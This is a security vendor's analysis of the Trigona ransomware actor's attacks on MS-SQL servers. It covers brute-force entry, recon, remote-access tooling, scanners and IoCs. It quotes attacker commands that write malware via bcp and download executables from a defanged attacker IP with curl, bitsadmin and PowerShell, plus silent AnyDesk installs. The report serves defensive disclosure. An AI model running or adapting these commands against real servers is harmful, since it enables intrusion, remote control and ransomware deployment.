Analysis of Trigona Threat Actor’s Latest Attack Cases

AhnLab SEcurity intelligence Center (ASEC) has covered the case of Trigona threat actors attacking MS-SQL servers in the past post, “Trigona Ransomware Threat Actor Uses Mimic Ransomware.”[1] In the attack cases, both Trigona and Mimic ransomware were used. However, while the email address used by the threat actor in the ransom note of Mimic has not been identified in other attack cases, the email address used by the Trigona threat actor has been used since early 2023, so it is presumed that it is the same Trigona threat actor.

ASEC has found that the same threat actor is still active and is attacking targets in a similar manner to the past cases, but is using new types of malware and tools. As a result, ASEC has released the latest attack cases and IoCs.

 

1. Attacks on MS-SQL Servers

Similar to the post “Trigona Ransomware Attacking MS-SQL Servers”[2], the Trigona threat actors are attacking MS-SQL servers that are vulnerable to brute-force and dictionary attacks because their accounts are configured with simple credentials, or that are exposed to the public. After successfully logging in, the threat actors use CLR Shell to install additional payloads, and this pattern has been consistent in recent cases as well. The following are the commands that the threat actors executed after gaining control over the MS-SQL servers to obtain information about the infected systems.

> hostname
> whoami
> systeminfo
> tasklist
> wmic useraccount where (LocalAccount=True) get name
> powershell -Command “net user ladmin

 

2. Malware Installation Method

One of the key characteristics of the Trigona threat actor is that they create files using the Bulk Copy Program (BCP). The bcp.exe utility is a command-line tool used to import and export large volumes of external data in MS-SQL servers. Typically, it is used to save large volumes of data stored in a SQL server table to a local file, or to export data files stored locally to a table in an SQL server.

The threat actor used BCP to store malware in the database and then create it as a file locally. This means that the threat actor used the following commands in the table “uGnzBdZbsi” where the malware is stored to export the malware to a local path, and “FODsOZKgAU.txt” is a format file that contains format information. Additionally, “uGnzBdZbsi” and “FODsOZKgAU.txt” are both keywords that were used in the 2024 attack case.

> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\spd.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\AD.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[User Name]\music\L.bat” -T -f “C:\users\[User Name]\music\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\[User Name]\music\pci2.exe” -T -f “C:\users\[User Name]\music\FODsOZKgAU.txt

Figure 1. Creating malware using BCP

Of course, BCP is not the only tool exploited by the threat actors. In the cases of attacks, various tools such as Curl, Bitsadmin, and PowerShell were used to download malware.

> curl hxxps://cia[.]tf/60b30e194972f937b859d0075be69e2a.exe -o C:\Windows\SERVIC~1\MSSQL$~1\AppData\Local\Temp\glock.exe
> bitsadmin /transfer indirme  /download /priority normal hxxp://195.66.214[.]79/pci.exe c:\users\[username]\Videos\pci.exe
> powershell Invoke-WebRequest -Uri “hxxp://195.66.214[.]79/L.bat” -OutFile “c:\users\[username]\music\L.bat

 

3. Analyzing Malware

3.1. Remote Control

As in previous cases, the threat actor abused AnyDesk to control the infected system. They installed AnyDesk in the %ALLUSERSPROFILE% path using the following commands.

> %SystemDrive%/programdata/AD.exe  –install C:\programdata –silent
> %SystemDrive%/programdata/Anydesk-e7eba7df  –get-id

In addition, RDP was used to execute a batch file like the one below to add a user who can connect to RDP with the names “Remote99” or “Ladmin”. This particular batch malware also includes a feature that modifies the AnyDesk or UseLogonCredential registry key.

Figure 2. Batch file responsible for adding users

Among the newly identified malware, there is a downloader made with Bat2Exe. Its main function is to create and execute a Batch file that looks like the following. This Batch script also creates an account named “erp2,” but the additional feature is that it installs an MSI file from an external source. As of now, it is not possible to download the file, but it is presumed to be the installation of an RMM tool called Teramind. It appears that the threat actor utilized Teramind in addition to RDP and AnyDesk to control the infected system.

Figure 3. Teramind downloader script

 

3.2. Scanner (RDP, MS-SQL)

The most notable difference from previous cases is the use of multiple scanner malware. The scanner is written in Rust and when executed, it sends information about the infected system, including the IP and location information obtained through “ip-api.com”, to the C&C server. It then performs scans according to the commands given. The targets of the scans are RDP and MS-SQL services.

Figure 4. Strings of the Rust Scanner malware

Additionally, the threat actor seems to perform tests before installing such scanning and brute-forcing malware. Among the various tools installed by the threat actor, they have used SpeedTest, an internet speed measurement tool provided by Ookla, and StressTester, which is assumed to have been developed by the threat actor themselves. StressTester is written in Go and provides testing features for SQL injection requests as well as GET and POST requests.

Figure 5. StressTester with SQL Injection feature

 

3.3. Others

There are other privilege escalation tools available in Defender Control and GitHub. [3] Various malware and tools were used in attacks, such as malware that deletes files in specific paths and malware that replaces executable files in specific paths with malicious code. There is also a type of malware that deletes files that is developed in Rust, and there is another type that is in a batch script format. This malware is responsible for deleting directories in paths where the malware is installed, such as “C:\Users\Default\Drivers” and “C:\Drivers,” and it also deletes the “.exe” executable files in the “C:\ProgramData” and “C:\Users\Public\Music” directories.

Figure 6. Batch script responsible for deleting directories and files

 

4. Conclusion

Key attacks against MS-SQL servers include brute force and dictionary attacks on systems that manage account credentials poorly. Administrators must use complex passwords that are difficult to guess and regularly change them to protect their database servers from brute force and dictionary attacks.

Users must also update V3 to the latest version so that malware infection can be prevented. Also, security products such as a firewall must be used to control the access of external threat actors to the database server. If these measures are not taken, threat actors and malware may continue to infect the server.

 

MD5

2e4d250ecae8635fa3698eba5772a3b9

3c21181c35d955f9e557417998c38942

44bca3e7da4c28be4f55af0370091931

4af4c15092110057cb0a97df626c4ef4

4d627c63fdd8442eaf7d9be7e50d1e46

URL

http[:]//195[.]66[.]214[.]79/AD[.]exe

http[:]//195[.]66[.]214[.]79/AD[.]msi

http[:]//195[.]66[.]214[.]79/L[.]bat

http[:]//195[.]66[.]214[.]79/Monitor[.]exe

http[:]//195[.]66[.]214[.]79/drivers[.]txt

IP

179[.]43[.]159[.]186

198[.]55[.]98[.]133